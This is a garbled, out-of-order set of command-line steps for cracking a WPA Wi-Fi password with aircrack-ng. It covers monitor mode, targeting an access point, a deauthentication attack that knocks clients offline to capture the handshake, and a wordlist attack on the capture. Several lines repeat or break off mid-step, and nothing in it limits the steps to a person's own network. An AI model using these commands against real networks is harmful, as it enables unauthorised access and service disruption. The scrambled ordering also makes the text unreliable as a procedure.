aircrack-ng -w wordlist.txt capture-01.cap
Restore network services:
WPA handshake: <AP_MAC> The .cap file now contains the handshake. Press Ctrl+C to stop airodump-ng . To verify the handshake explicitly: aircrack-ng handshake
sudo airmon-ng check kill Start monitor mode on the interface (e.g., wlan0):
sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01.cap . If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack): aircrack-ng -w wordlist
sudo airodump-ng wlan0mon Note the (MAC of target AP), CH (channel), and ESSID (network name). 3. Focus on the Target AP Start a targeted capture to a file:
sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs. In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see: The output files will begin with capture-01
sudo airmon-ng Kill interfering processes:
sudo airmon-ng start wlan0 The interface becomes wlan0mon . Use airodump-ng to discover nearby networks:
sudo aircrack-ng capture-01.cap If valid, Aircrack-ng will show “1 handshake” in the output.
